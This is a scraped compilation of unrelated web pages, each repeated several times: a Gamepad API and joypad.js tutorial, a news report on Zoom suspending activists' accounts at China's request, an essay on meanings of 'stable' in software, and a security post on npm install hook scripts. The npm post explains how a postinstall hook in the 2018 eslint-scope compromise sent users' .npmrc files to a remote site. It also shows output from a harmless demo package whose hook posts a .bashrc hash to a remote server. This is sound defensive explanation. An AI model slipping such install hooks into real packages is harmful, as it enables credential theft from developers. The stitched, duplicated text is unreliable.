That is the very reason why I created joypad.js- a JavaScript library that lets you connect and use various gaming controllers with browsers that support the Gamepad API. It's less than 5KB in size with zero dependencies and has support for button press, axis movement events and vibration play effect.
Subscribing to events is as simple as specifying an event name and a callback that is fired whenever the specified event is triggered.
Subscribing to an event using joypad.js
For more details on how to use it or to know how it works under the hood (Spoiler alert: it uses the requestAnimationFrame() polling technique), please feel free to go to its Github page.
Now coming back to the Gamepad API, the button/axis layout is as follows -
This is the Standard Gamepad button layout which is supported by most controllers in which button locations are laid out in a left cluster of four buttons, a right cluster of four buttons, a center cluster of three buttons (some controllers have four) and a pair of front-facing buttons (shoulder buttons) on the left and right side of the gamepad.
Please note that since the Gamepad API is in very early stages, the standard gamepad button layout may differ from browser to browser. The image shown above describes the default button mappings as on Chrome.
Browser support
As of now the Gamepad specification is a work in progress and was published by the Web Applications Working Group as a working draft. The specification is intended to become a W3C recommendation.
I would like to point out again that the Gamepad API is in very early stages so it may undergo major changes in terms of implementation and usage. But that shouldn't stop you from experimenting with it. So go ahead give it a try, add gamepad support to your existing games or maybe develop some new ones!
In the next blog post of the series, I would be covering the Accelerometer API. So keep an eye out on this space for more info.
That pretty much sums it up! If you have any questions or suggestions, don't forget to leave a comment down below. Also, feel free to say hi 👋 to me on Twitter and Github.
Cheers!
Published on Sun Jun 14 2020
Image source - vecteezy.com
A few weeks back I started the Web platform's hidden gems blog series. The idea behind the series is to cover the native API enhancements to the web platform and shed some light on how these APIs can be used to create some really interesting experiences on the web.
Even though these APIs are in very early stages at the moment, they seem to be really promising and tend to provide an idea on how web development in the coming years would look like. Having said that, I feel that it's important for developers to know about these specifications and understand the possibilities that the native web has to offer!
This is the first blog post of the series and in this post, I'll be talking about the Gamepad API.
Just a disclaimer though, this API is in very early stages and may undergo major changes in terms of implementation and usage.
Connecting a gamepad to the browser
The Gamepad specification defines a low-level interface that represents gamepad devices.
This means that using this API, developers would be able to connect gamepads and similar input devices to the browser and be able to use them in their gaming applications. There would be no need to design any complex mouse/keyboard based interfaces for game controls that can be tricky to operate and can take some time to get used to. Game developers would be able to provide more natural controls to their users like joystick driven character movements.
The gamepadconnected event is emitted whenever a new gamepad is connected to the page. If the gamepad is already connected when the page loads and gains focus then the event is emitted when a button is pressed or an axis is moved on the gamepad.
Logging info of a connected gamepad
The window.navigator.getGamepads() method returns an array of Gamepad objects, one for each gamepad connected to the device. The Gamepad API supports up to 4 simultaneous connections at the moment.
If you log out the 0th index (the first connected gamepad) you can see the gamepad info -
The Gamepad interface stores information about the connected gamepad
The gamepaddisconnected event is emitted whenever a gamepad (which has previously received data from the page) has been disconnected.
Logging info of a disconnected gamepad
Tracking button press and axis movement
Currently, the gamepad API only supports these two events - gamepadconnected and gamepaddisconnected. There is no standardized way to detect gamepad button presses or axis movements. The Gamepad interface does return useful information about the gamepad buttons, axes and their current states (button press and axis movement values) but there is no actual event that is dispatched when these actions are performed by the user.
Capturing button state changes using requestAnimationFrame()
In the context of a video game, a game loop is something that continuously checks for user input, updates the game state and renders the scene. requestAnimationFrame() seems to be fitting well for this as we can perform all these operations in its callback and it would remain in sync with the repaint tasks in every frame.
Ideally that's how user input should be polled in a gaming application.
I'd highly recommend checking this article - Anatomy of a video game, if you want to know more about how a typical game loop workflow can be implemented in JavaScript.
This does give us the user input states as expected but we still need a way to store and discard these values in an efficient way. Ideally in the form of an API that can be exposed and reused in any gaming application.
That is the very reason why I created joypad.js- a JavaScript library that lets you connect and use various gaming controllers with browsers that support the Gamepad API. It's less than 5KB in size with zero dependencies and has support for button press, axis movement events and vibration play effect.
Subscribing to events is as simple as specifying an event name and a callback that is fired whenever the specified event is triggered.
Subscribing to an event using joypad.js
For more details on how to use it or to know how it works under the hood (Spoiler alert: it uses the requestAnimationFrame() polling technique), please feel free to go to its Github page.
Now coming back to the Gamepad API, the button/axis layout is as follows -
This is the Standard Gamepad button layout which is supported by most controllers in which button locations are laid out in a left cluster of four buttons, a right cluster of four buttons, a center cluster of three buttons (some controllers have four) and a pair of front-facing buttons (shoulder buttons) on the left and right side of the gamepad.
Please note that since the Gamepad API is in very early stages, the standard gamepad button layout may differ from browser to browser. The image shown above describes the default button mappings as on Chrome.
Browser support
As of now the Gamepad specification is a work in progress and was published by the Web Applications Working Group as a working draft. The specification is intended to become a W3C recommendation.
I would like to point out again that the Gamepad API is in very early stages so it may undergo major changes in terms of implementation and usage. But that shouldn't stop you from experimenting with it. So go ahead give it a try, add gamepad support to your existing games or maybe develop some new ones!
In the next blog post of the series, I would be covering the Accelerometer API. So keep an eye out on this space for more info.
That pretty much sums it up! If you have any questions or suggestions, don't forget to leave a comment down below. Also, feel free to say hi 👋 to me on Twitter and Github.
Cheers!
Image source - vecteezy.com
A few weeks back I started the Web platform's hidden gems blog series. The idea behind the series is to cover the native API enhancements to the web platform and shed some light on how these APIs can be used to create some really interesting experiences on the web.
Even though these APIs are in very early stages at the moment, they seem to be really promising and tend to provide an idea on how web development in the coming years would look like. Having said that, I feel that it's important for developers to know about these specifications and understand the possibilities that the native web has to offer!
This is the first blog post of the series and in this post, I'll be talking about the Gamepad API.
Just a disclaimer though, this API is in very early stages and may undergo major changes in terms of implementation and usage.
Connecting a gamepad to the browser
The Gamepad specification defines a low-level interface that represents gamepad devices.
This means that using this API, developers would be able to connect gamepads and similar input devices to the browser and be able to use them in their gaming applications. There would be no need to design any complex mouse/keyboard based interfaces for game controls that can be tricky to operate and can take some time to get used to. Game developers would be able to provide more natural controls to their users like joystick driven character movements.
The gamepadconnected event is emitted whenever a new gamepad is connected to the page. If the gamepad is already connected when the page loads and gains focus then the event is emitted when a button is pressed or an axis is moved on the gamepad.
Logging info of a connected gamepad
The window.navigator.getGamepads() method returns an array of Gamepad objects, one for each gamepad connected to the device. The Gamepad API supports up to 4 simultaneous connections at the moment.
If you log out the 0th index (the first connected gamepad) you can see the gamepad info -
The Gamepad interface stores information about the connected gamepad
The gamepaddisconnected event is emitted whenever a gamepad (which has previously received data from the page) has been disconnected.
Logging info of a disconnected gamepad
Tracking button press and axis movement
Currently, the gamepad API only supports these two events - gamepadconnected and gamepaddisconnected. There is no standardized way to detect gamepad button presses or axis movements. The Gamepad interface does return useful information about the gamepad buttons, axes and their current states (button press and axis movement values) but there is no actual event that is dispatched when these actions are performed by the user.
Capturing button state changes using requestAnimationFrame()
In the context of a video game, a game loop is something that continuously checks for user input, updates the game state and renders the scene. requestAnimationFrame() seems to be fitting well for this as we can perform all these operations in its callback and it would remain in sync with the repaint tasks in every frame.
Ideally that's how user input should be polled in a gaming application.
I'd highly recommend checking this article - Anatomy of a video game, if you want to know more about how a typical game loop workflow can be implemented in JavaScript.
This does give us the user input states as expected but we still need a way to store and discard these values in an efficient way. Ideally in the form of an API that can be exposed and reused in any gaming application.
That is the very reason why I created joypad.js- a JavaScript library that lets you connect and use various gaming controllers with browsers that support the Gamepad API. It's less than 5KB in size with zero dependencies and has support for button press, axis movement events and vibration play effect.
Subscribing to events is as simple as specifying an event name and a callback that is fired whenever the specified event is triggered.
Subscribing to an event using joypad.js
For more details on how to use it or to know how it works under the hood (Spoiler alert: it uses the requestAnimationFrame() polling technique), please feel free to go to its Github page.
Now coming back to the Gamepad API, the button/axis layout is as follows -
This is the Standard Gamepad button layout which is supported by most controllers in which button locations are laid out in a left cluster of four buttons, a right cluster of four buttons, a center cluster of three buttons (some controllers have four) and a pair of front-facing buttons (shoulder buttons) on the left and right side of the gamepad.
Please note that since the Gamepad API is in very early stages, the standard gamepad button layout may differ from browser to browser. The image shown above describes the default button mappings as on Chrome.
Browser support
As of now the Gamepad specification is a work in progress and was published by the Web Applications Working Group as a working draft. The specification is intended to become a W3C recommendation.
I would like to point out again that the Gamepad API is in very early stages so it may undergo major changes in terms of implementation and usage. But that shouldn't stop you from experimenting with it. So go ahead give it a try, add gamepad support to your existing games or maybe develop some new ones!
In the next blog post of the series, I would be covering the Accelerometer API. So keep an eye out on this space for more info.
That pretty much sums it up! If you have any questions or suggestions, don't forget to leave a comment down below. Also, feel free to say hi 👋 to me on Twitter and Github.
title: Zoom acknowledges its compliance with the Chinese government and suspends rights users
title: Zoom acknowledges its compliance with the Chinese government and suspends rights users description: Video conferencing software company Zoom acknowledged that, at the request of the Chinese government, the company suspended user accounts in the United States and Hong Kong, and intends to add… image: https://baseread.com/wp-content/uploads/2020/04/Zoom-Accounts.png
author: Indra Shambahamphe description: Video conferencing software company Zoom acknowledged that, at the request of the Chinese government, the company suspended user accounts in the United States and Hong Kong, and intends to add functionality to block or evacuate meeting participants f image: https://baseread.com/wp-content/uploads/2020/04/Zoom-Accounts.png title: Zoom acknowledges its compliance with the Chinese government and suspends rights users
Video conferencing software company Zoom acknowledged that, at the request of the Chinese government, the company suspended user accounts in the United States and Hong Kong, and intends to add functionality to block or evacuate meeting participants from mainland China.
Zoom suspended the speeches of three activists last week. They are Li Zhuoren, Wang Dan, and Zhou Fengsuo. They used the service to discuss the anniversary of the Tiananmen massacre online. Two of these accounts are located in Hong Kong and one is in the United States.
The company said it suspended these accounts at the request of the Chinese government, although it is unclear which laws have been violated by landlords living in mainland China.
Zoom stated in the blog that after “the Chinese government informed us that the event is illegal in China and asked Zoom to terminate the meeting and the hosting account”, Zoom suspended the use of users. We are committed to being a platform for the open exchange of ideas and dialogue. “
Zoom has now restored the accounts of these three users, but in fact, deprived them of the opportunity to talk to other democratic organizers at a critical time. Zoom said it has taken this measure because it cannot block meeting participants by country/region, so when seeing some mainland Chinese users attend the meeting, Zoom must terminate the meeting.
Zoom said, “Technologies will be developed in the next few days, which will allow us to remove or block at the participant level based on geographic location. When local authorities determine that activities on the platform are illegal within their borders, this will enable us to Observe the requirements of local authorities.
The company said: “Continuing Zoom does not allow the Chinese government’s request to affect anyone outside of mainland China.” But this is unlikely to comfort the mainland or Hong Kong activists who are looking for safe communication between each other or abroad.
An affected activist, Li Zhuoren, who is based in Hong Kong, expressed frustration with the company’s actions to the Guardian. He said: “They have restored my account, but Zoom continues to kneel in front of the Communist Party.”
“The purpose of opening Zoom is to reach mainland China and break the censorship system of the Communist Party of China. With this policy, I cannot achieve ‘S original intention.”
On Friday, a dozen bipartisan legislators led by Senators Marco Rubio and Ron Wyden sent a letter to Eric Yuan, CEO of Zoom, requesting further details about the company’s How many accounts have been closed.
The authority of the Chinese government. The lawmakers also resolved concerns about whether Zoom shares user data with the Chinese government. They said at the end of the letter that Zoom “must be transparent and foreign governments are not allowed to dictate terms of use.
Video conferencing software company Zoom acknowledged that, at the request of the Chinese government, the company suspended user accounts in the United States and Hong Kong, and intends to add functionality to block or evacuate meeting participants from mainland China.
Zoom suspended the speeches of three activists last week. They are Li Zhuoren, Wang Dan, and Zhou Fengsuo. They used the service to discuss the anniversary of the Tiananmen massacre online. Two of these accounts are located in Hong Kong and one is in the United States.
The company said it suspended these accounts at the request of the Chinese government, although it is unclear which laws have been violated by landlords living in mainland China.
Zoom stated in the blog that after “the Chinese government informed us that the event is illegal in China and asked Zoom to terminate the meeting and the hosting account”, Zoom suspended the use of users. We are committed to being a platform for the open exchange of ideas and dialogue. “
Zoom has now restored the accounts of these three users, but in fact, deprived them of the opportunity to talk to other democratic organizers at a critical time. Zoom said it has taken this measure because it cannot block meeting participants by country/region, so when seeing some mainland Chinese users attend the meeting, Zoom must terminate the meeting.
Zoom said, “Technologies will be developed in the next few days, which will allow us to remove or block at the participant level based on geographic location. When local authorities determine that activities on the platform are illegal within their borders, this will enable us to Observe the requirements of local authorities.
The company said: “Continuing Zoom does not allow the Chinese government’s request to affect anyone outside of mainland China.” But this is unlikely to comfort the mainland or Hong Kong activists who are looking for safe communication between each other or abroad.
An affected activist, Li Zhuoren, who is based in Hong Kong, expressed frustration with the company’s actions to the Guardian. He said: “They have restored my account, but Zoom continues to kneel in front of the Communist Party.”
“The purpose of opening Zoom is to reach mainland China and break the censorship system of the Communist Party of China. With this policy, I cannot achieve ‘S original intention.”
On Friday, a dozen bipartisan legislators led by Senators Marco Rubio and Ron Wyden sent a letter to Eric Yuan, CEO of Zoom, requesting further details about the company’s How many accounts have been closed.
The authority of the Chinese government. The lawmakers also resolved concerns about whether Zoom shares user data with the Chinese government. They said at the end of the letter that Zoom “must be transparent and foreign governments are not allowed to dictate terms of use.
Video conferencing software company Zoom acknowledged that, at the request of the Chinese government, the company suspended user accounts in the United States and Hong Kong, and intends to add functionality to block or evacuate meeting participants from mainland China.
Zoom suspended the speeches of three activists last week. They are Li Zhuoren, Wang Dan, and Zhou Fengsuo. They used the service to discuss the anniversary of the Tiananmen massacre online. Two of these accounts are located in Hong Kong and one is in the United States.
The company said it suspended these accounts at the request of the Chinese government, although it is unclear which laws have been violated by landlords living in mainland China.
Zoom stated in the blog that after “the Chinese government informed us that the event is illegal in China and asked Zoom to terminate the meeting and the hosting account”, Zoom suspended the use of users. We are committed to being a platform for the open exchange of ideas and dialogue. “
Zoom has now restored the accounts of these three users, but in fact, deprived them of the opportunity to talk to other democratic organizers at a critical time. Zoom said it has taken this measure because it cannot block meeting participants by country/region, so when seeing some mainland Chinese users attend the meeting, Zoom must terminate the meeting.
Zoom said, “Technologies will be developed in the next few days, which will allow us to remove or block at the participant level based on geographic location. When local authorities determine that activities on the platform are illegal within their borders, this will enable us to Observe the requirements of local authorities.
The company said: “Continuing Zoom does not allow the Chinese government’s request to affect anyone outside of mainland China.” But this is unlikely to comfort the mainland or Hong Kong activists who are looking for safe communication between each other or abroad.
An affected activist, Li Zhuoren, who is based in Hong Kong, expressed frustration with the company’s actions to the Guardian. He said: “They have restored my account, but Zoom continues to kneel in front of the Communist Party.”
“The purpose of opening Zoom is to reach mainland China and break the censorship system of the Communist Party of China. With this policy, I cannot achieve ‘S original intention.”
On Friday, a dozen bipartisan legislators led by Senators Marco Rubio and Ron Wyden sent a letter to Eric Yuan, CEO of Zoom, requesting further details about the company’s How many accounts have been closed.
The authority of the Chinese government. The lawmakers also resolved concerns about whether Zoom shares user data with the Chinese government. They said at the end of the letter that Zoom “must be transparent and foreign governments are not allowed to dictate terms of use.
title: what ‘stable’ means in software – The Bit Depth Blog
title: Stable vs stable: what ‘stable’ means in software description: I’ve come to learn that when someone refers to software as ‘stable’, there is more than one quite different thing they might mean. A stable software release A stable software release is so named… author: Thomas Rutter
author: Thomas Rutter image: https://secure.gravatar.com/avatar/4b21dfab5586c78d7f29d4c56c91e5dc?s=100&d=mm&r=g title: Stable vs stable: what ‘stable’ means in software – The Bit Depth Blog
I’ve come to learn that when someone refers to software as ‘stable’, there is more than one quite different thing they might mean.
A stable software release
A stable software release is so named because it is unchanging. Its behaviour, functionality, specification or API is considered ‘final’ for that version. Apart from security patches and bug fixes, the software will not change for as long as that version of the software is supported, usually from 1 to many years.
Software that is intended for the public to use is usually “stable”. It is released, and following the release no new features are added apart from the odd bug fix. To get new functionality users eventually need to upgrade to the next version. Any problems with the software (unless they can easily be fixed with a bug fix update) are “known” problems, and the software vendor does not need to keep track of more than one variantion of these problems for any given version.
Examples of releases that are the opposite of stable include development snapshots, beta releases, and rolling releases. A characteristic of all three of these is that they are in a frequent state of change; even their functionality and feature list can change from week to week, or day to day. You cannot depend on them to behave the same way from one week to the next.
Some people like that with non-stable releases such as development snapshots, beta releases or rolling releases, they are always getting the latest features as soon as they are written into the software. In many cases, these releases also fix deficiencies or bugs that would otherwise remain stagnant in the stable release. However, with no stability in the feature list or functionality, this affects the ability for documentation, other software that interfaces with the software, plugins, and more to function: a change in the software can mean these become out of date or fail to work anymore. When you have software which needs to work well with a lot of other software, having a stable release reduces the frequency with which changes in the software will break compatibility with the other software relying on it.
Another meaning of stable
Another meaning of stable exists in common use, where people take it to mean “working reliably” or “solid”. That is, people refer to software that runs consistently without crashing as stable. You can see why they may use the word in this way: in real life, when something can be described as stable, it won’t fall over. If a chair is stable enough, you can sit in it and it won’t topple or collapse.
However, confusion arises when people use this form of the word stable to refer to software that isn’t stable in the earlier sense. For example, it’s why you see comments like “I’ve been using the beta version since February and it is very stable” or “the newer version is more stable”. The point that these comments make is not that the software is final and unchanging, as in a stable software release, but more that the software is stable like a chair might be stable. It seems reliable, and the user hasn’t experience any major problems.
This kind of stability won’t help developers extending the software with other software, or writing plugins or customisations for the software, since the fact that at any given time the software is running well does not make up for the fact that the software is subject to frequent changes.
Commenters or reviewers who describe beta or rolling releases of software as stable, might want to try describing them as “solid” or “reliable” instead, to save confusion with a stable release which is an unchanging release. Or, the fact that the same term is understood in two different and sometimes conflicting ways may indicate that the term is not an ideal one in the first place. It does, however, seem firmly entrenched in the software development world, where the meaning of a stable release is well known.
I’ve come to learn that when someone refers to software as ‘stable’, there is more than one quite different thing they might mean.
A stable software release
A stable software release is so named because it is unchanging. Its behaviour, functionality, specification or API is considered ‘final’ for that version. Apart from security patches and bug fixes, the software will not change for as long as that version of the software is supported, usually from 1 to many years.
Software that is intended for the public to use is usually “stable”. It is released, and following the release no new features are added apart from the odd bug fix. To get new functionality users eventually need to upgrade to the next version. Any problems with the software (unless they can easily be fixed with a bug fix update) are “known” problems, and the software vendor does not need to keep track of more than one variantion of these problems for any given version.
Examples of releases that are the opposite of stable include development snapshots, beta releases, and rolling releases. A characteristic of all three of these is that they are in a frequent state of change; even their functionality and feature list can change from week to week, or day to day. You cannot depend on them to behave the same way from one week to the next.
Some people like that with non-stable releases such as development snapshots, beta releases or rolling releases, they are always getting the latest features as soon as they are written into the software. In many cases, these releases also fix deficiencies or bugs that would otherwise remain stagnant in the stable release. However, with no stability in the feature list or functionality, this affects the ability for documentation, other software that interfaces with the software, plugins, and more to function: a change in the software can mean these become out of date or fail to work anymore. When you have software which needs to work well with a lot of other software, having a stable release reduces the frequency with which changes in the software will break compatibility with the other software relying on it.
Another meaning of stable
Another meaning of stable exists in common use, where people take it to mean “working reliably” or “solid”. That is, people refer to software that runs consistently without crashing as stable. You can see why they may use the word in this way: in real life, when something can be described as stable, it won’t fall over. If a chair is stable enough, you can sit in it and it won’t topple or collapse.
However, confusion arises when people use this form of the word stable to refer to software that isn’t stable in the earlier sense. For example, it’s why you see comments like “I’ve been using the beta version since February and it is very stable” or “the newer version is more stable”. The point that these comments make is not that the software is final and unchanging, as in a stable software release, but more that the software is stable like a chair might be stable. It seems reliable, and the user hasn’t experience any major problems.
This kind of stability won’t help developers extending the software with other software, or writing plugins or customisations for the software, since the fact that at any given time the software is running well does not make up for the fact that the software is subject to frequent changes.
Commenters or reviewers who describe beta or rolling releases of software as stable, might want to try describing them as “solid” or “reliable” instead, to save confusion with a stable release which is an unchanging release. Or, the fact that the same term is understood in two different and sometimes conflicting ways may indicate that the term is not an ideal one in the first place. It does, however, seem firmly entrenched in the software development world, where the meaning of a stable release is well known.
I’ve come to learn that when someone refers to software as ‘stable’, there is more than one quite different thing they might mean.
A stable software release
A stable software release is so named because it is unchanging. Its behaviour, functionality, specification or API is considered ‘final’ for that version. Apart from security patches and bug fixes, the software will not change for as long as that version of the software is supported, usually from 1 to many years.
Software that is intended for the public to use is usually “stable”. It is released, and following the release no new features are added apart from the odd bug fix. To get new functionality users eventually need to upgrade to the next version. Any problems with the software (unless they can easily be fixed with a bug fix update) are “known” problems, and the software vendor does not need to keep track of more than one variantion of these problems for any given version.
Examples of releases that are the opposite of stable include development snapshots, beta releases, and rolling releases. A characteristic of all three of these is that they are in a frequent state of change; even their functionality and feature list can change from week to week, or day to day. You cannot depend on them to behave the same way from one week to the next.
Some people like that with non-stable releases such as development snapshots, beta releases or rolling releases, they are always getting the latest features as soon as they are written into the software. In many cases, these releases also fix deficiencies or bugs that would otherwise remain stagnant in the stable release. However, with no stability in the feature list or functionality, this affects the ability for documentation, other software that interfaces with the software, plugins, and more to function: a change in the software can mean these become out of date or fail to work anymore. When you have software which needs to work well with a lot of other software, having a stable release reduces the frequency with which changes in the software will break compatibility with the other software relying on it.
Another meaning of stable
Another meaning of stable exists in common use, where people take it to mean “working reliably” or “solid”. That is, people refer to software that runs consistently without crashing as stable. You can see why they may use the word in this way: in real life, when something can be described as stable, it won’t fall over. If a chair is stable enough, you can sit in it and it won’t topple or collapse.
However, confusion arises when people use this form of the word stable to refer to software that isn’t stable in the earlier sense. For example, it’s why you see comments like “I’ve been using the beta version since February and it is very stable” or “the newer version is more stable”. The point that these comments make is not that the software is final and unchanging, as in a stable software release, but more that the software is stable like a chair might be stable. It seems reliable, and the user hasn’t experience any major problems.
This kind of stability won’t help developers extending the software with other software, or writing plugins or customisations for the software, since the fact that at any given time the software is running well does not make up for the fact that the software is subject to frequent changes.
Commenters or reviewers who describe beta or rolling releases of software as stable, might want to try describing them as “solid” or “reliable” instead, to save confusion with a stable release which is an unchanging release. Or, the fact that the same term is understood in two different and sometimes conflicting ways may indicate that the term is not an ideal one in the first place. It does, however, seem firmly entrenched in the software development world, where the meaning of a stable release is well known.
4 Replies to “Stable vs stable: what ‘stable’ means in software”
Thanks. Have been trying to resolve this confusion for a while, as I have used the word in both senses at different times. More often than not, I’m trying to convey both “not crashing in normal use” and for related reasons “not under rapid development” but still well-maintained. If we’re going to disambiguate, maybe should avoid “unstable” and say “it crashes”. Would it be pretentious to suggest “inchoate” or “in flux” for the other meaning, although I can’t see “Debian unstable” being renamed?
title: npm Install Hook Scripts: Intro (Part 1) description: npm is the de-facto package manager for JavaScript code. Though initially intended for use with node.js, it’s expanded to managing dependencies on the frontend…
description: npm is the de-facto package manager for JavaScript code. Though initially intended for use with node.js, it’s expanded to managing dependencies on the frontend… image: data:image/jpeg;base64,/9j/2wBDABALDA4MChAODQ4SERATGCgaGBYWGDEjJR0oOjM9PDkzODdASFxOQERXRTc4UG1RV19iZ2hnPk1xeXBkeFxlZ2P/2wBDARESEhgVGC8aGi9jQjhCY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2P/wgARCAAUABQDASIAAhEBAxEB/8QAGAABAQEBAQAAAAAAAAAAAAAAAAMFAQL/xAAXAQEBAQEAAAAAAAAAAAAAAAABAgAD/9oADAMBAAIQAxAAAAG8KyzqM0z44dYgE//EAB8QAAEDAwUAAAAAAAAAAAAAAAEAAhIDBCIRISMxM//aAAgBAQABBQK45WjFMeIrXaaHv2aRx//EABkRAAIDAQAAAAAAAAAAAAAAAAABAhAxIf/aAAgBAwEBPwFZU30lp//EABkRAAIDAQAAAAAAAAAAAAAAAAABAhAxIf/aAAgBAgEBPwF7UcEuH//EABwQAAIBBQEAAAAAAAAAAAAAAAABAhARITFhof/aAAgBAQAGPwKMdZErpx4KnhsnzRYyrn//xAAbEAEAAwADAQAAAAAAAAAAAAABABEhMWFxUf/aAAgBAQABPyEKmK2wLMRxgBPyWvEB46VBBQieTZ0mIwpl+SjWz//aAAwDAQACAAMAAAAQoOD9/8QAGREBAQEAAwAAAAAAAAAAAAAAAQARIUGx/9oACAEDAQE/EMqW2Y4vR5N3f//EABcRAQEBAQAAAAAAAAAAAAAAAAEAESH/2gAIAQIBAT8Q4AWQEbFjl//EABsQAQEBAQEBAQEAAAAAAAAAAAERACExQVFx/9oACAEBAAE/EDo7SNJ0xe+qelfp+e5HGgvMuBjfCXKdRE6HjFhx8G6bhAAedBgQ6953+6yJKEdm/9k= title: npm Install Hook Scripts: Intro (Part 1)
npm1 is the de-facto package manager for JavaScript code. Though initially intended for use with node.js, it’s expanded to managing dependencies on the frontend as well. npm makes a developer’s life substantially more convenient, but it provides that convenience at the cost of security. In particular, npm is happy to auto-execute package scripts upon install, thanks to various install hook scripts.
Rising Issues
Historically, the automatic execution of scripts during the install process made sense. The same user privileges that were being used to run npm install were being used to run the node application that leveraged those packages, so any malicious activity could have just as easily been in the package’s JS files (ie executing upon require('package')), instead of needing to be triggered by the install hook scripts. However, this assumption is no longer the case in many situations. As npm is used to manage frontend dependencies this assumption breaks down. A user may execute npm install using their full privileged user account, but the actual JavaScript module in the package will never run outside of the browser’s sandbox. Therefore, the only point at which a package could perform a malicious activity on the user’s machine (such as exfiltrating data from their filesystem, writing arbitrary files, etc.) would be through one of these install hook scripts.
In the Wild
In July of 2018, eslint-escope and eslint-config-eslint were modified of to include a postinstall hook script that located a user’s .npmrc file and send that file to a remote website2. The attacker used previously compromised credentials to publish these malicious versions of the package. Over the next two hours the compromised packages exfiltrated .npmrc files, and since the packages were dependencies of extremely popular packages, babel-eslint, it’s likely they had a noticeable install population3.
{
+ "postinstall": "node ./lib/build.js",
}
npm’s Auto-Run Scripts, According To The Docs
npm details the various scripts that are executed automatically during the install process at cli/doc/misc/npm-scripts#e2346e7/. I’ve reflected the relevant script hooks here that are executed during the install process:
preinstall:
Run BEFORE the package is installed
install, postinstall:
Run AFTER the package is installed.
preuninstall, uninstall:
Run BEFORE the package is uninstalled.
postuninstall:
Run AFTER the package is uninstalled.
Additionally, the docs provide a recommendation (emphasis mine):
Don’t use install. Use a .gyp file for compilation, and prepublish for anything else. You should almost never have to explicitly set a preinstall or install script. If you are doing this, please consider if there is another option. The only valid use of install or preinstall scripts is for compilation which must be done on the target architecture.
The last sentence explains why these hooks exist at all, instead of npm just autodetecting the need to handle .gyp files for compilation: npm is trying to be as flexible as possible.
Demonstrations
To demonstrate what someone could do with these automated hooks, I’ve created a toy package at awendland/npm-install-hook-test. If you clone the repo you can run ./run_demo.sh to see what’s going on (nothing evil will happen). Besides printing out the name of the hook being run at each of the install hook scripts, the package can do two other things:
POST the sha256 of your .bashrc file to a remote server
Use brew to install cowsay
This demonstrates that npm is not putting strong restrictions on the install scripts being executed. Here’s an abbreviated version of what you’d see upon executing run_demo.sh (which 1. builds the package, 2. installs the package, 3. uninstalls the package):
######################
# Installing package #
######################
script: preinstall
script: install
Updating Homebrew...
==> Downloading https://homebrew.bintray.com/bottles/cowsay-3.04.mojave.bottle.tar.gz
Already downloaded: /Users/awendland/Library/Caches/Homebrew/downloads/38854ad3bfa8be16c69e8b9813aebb2526a32b23a8ab3e7c1b33c24164e891c0--cowsay-3.04.mojave.bottle.tar.gz
==> Pouring cowsay-3.04.mojave.bottle.tar.gz
🍺 /usr/local/Cellar/cowsay/3.04: 65 files, 82.9KB
_______________________________________
/ Uh Oh! The install script in this npm \
| package just installed cowsay using |
\ brew. /
---------------------------------------
\ ^__^
\ (oo)\_______
(__)\ )\/\
||----w |
|| ||
script: postinstall
added 1 package from 1 contributor and audited 1 package in 11.306s
found 0 vulnerabilities
########################
# Uninstalling package #
########################
script: preuninstall
script: uninstall
removed 1 package in 0.672s
found 0 vulnerabilities
With the new uses of npm, it’s not appropriate to expect all developers to be wary of the malicious activities install hook scripts might perform. Many develoeprs may assume that since the packages are executing safely in the sandbox of their web browser there is no way for malicious packages to compromise their computers.
As the next step, I’m going to conduct a review of legitimate npm packages to see what an appropriate featureset for install hook scripts is. Two initial mitigation thoughts that came to mind were:
Creating a reduced execution environment for these install hooks, such as a DSL that only allows certain filesystem IO that’s scoped only to the packages install directory and a temp folder.
Add a new parameter to dependencies that require install hook script execution so that the consumer has to explicitly authorize it (this would have protected against the eslint-worm3), such as:
npm1 is the de-facto package manager for JavaScript code. Though initially intended for use with node.js, it’s expanded to managing dependencies on the frontend as well. npm makes a developer’s life substantially more convenient, but it provides that convenience at the cost of security. In particular, npm is happy to auto-execute package scripts upon install, thanks to various install hook scripts.
Rising Issues
Historically, the automatic execution of scripts during the install process made sense. The same user privileges that were being used to run npm install were being used to run the node application that leveraged those packages, so any malicious activity could have just as easily been in the package’s JS files (ie executing upon require('package')), instead of needing to be triggered by the install hook scripts. However, this assumption is no longer the case in many situations. As npm is used to manage frontend dependencies this assumption breaks down. A user may execute npm install using their full privileged user account, but the actual JavaScript module in the package will never run outside of the browser’s sandbox. Therefore, the only point at which a package could perform a malicious activity on the user’s machine (such as exfiltrating data from their filesystem, writing arbitrary files, etc.) would be through one of these install hook scripts.
In the Wild
In July of 2018, eslint-escope and eslint-config-eslint were modified of to include a postinstall hook script that located a user’s .npmrc file and send that file to a remote website2. The attacker used previously compromised credentials to publish these malicious versions of the package. Over the next two hours the compromised packages exfiltrated .npmrc files, and since the packages were dependencies of extremely popular packages, babel-eslint, it’s likely they had a noticeable install population3.
{
+ "postinstall": "node ./lib/build.js",
}
npm’s Auto-Run Scripts, According To The Docs
npm details the various scripts that are executed automatically during the install process at cli/doc/misc/npm-scripts#e2346e7/. I’ve reflected the relevant script hooks here that are executed during the install process:
preinstall:
Run BEFORE the package is installed
install, postinstall:
Run AFTER the package is installed.
preuninstall, uninstall:
Run BEFORE the package is uninstalled.
postuninstall:
Run AFTER the package is uninstalled.
Additionally, the docs provide a recommendation (emphasis mine):
Don’t use install. Use a .gyp file for compilation, and prepublish for anything else. You should almost never have to explicitly set a preinstall or install script. If you are doing this, please consider if there is another option. The only valid use of install or preinstall scripts is for compilation which must be done on the target architecture.
The last sentence explains why these hooks exist at all, instead of npm just autodetecting the need to handle .gyp files for compilation: npm is trying to be as flexible as possible.
Demonstrations
To demonstrate what someone could do with these automated hooks, I’ve created a toy package at awendland/npm-install-hook-test. If you clone the repo you can run ./run_demo.sh to see what’s going on (nothing evil will happen). Besides printing out the name of the hook being run at each of the install hook scripts, the package can do two other things:
POST the sha256 of your .bashrc file to a remote server
Use brew to install cowsay
This demonstrates that npm is not putting strong restrictions on the install scripts being executed. Here’s an abbreviated version of what you’d see upon executing run_demo.sh (which 1. builds the package, 2. installs the package, 3. uninstalls the package):
######################
# Installing package #
######################
script: preinstall
script: install
Updating Homebrew...
==> Downloading https://homebrew.bintray.com/bottles/cowsay-3.04.mojave.bottle.tar.gz
Already downloaded: /Users/awendland/Library/Caches/Homebrew/downloads/38854ad3bfa8be16c69e8b9813aebb2526a32b23a8ab3e7c1b33c24164e891c0--cowsay-3.04.mojave.bottle.tar.gz
==> Pouring cowsay-3.04.mojave.bottle.tar.gz
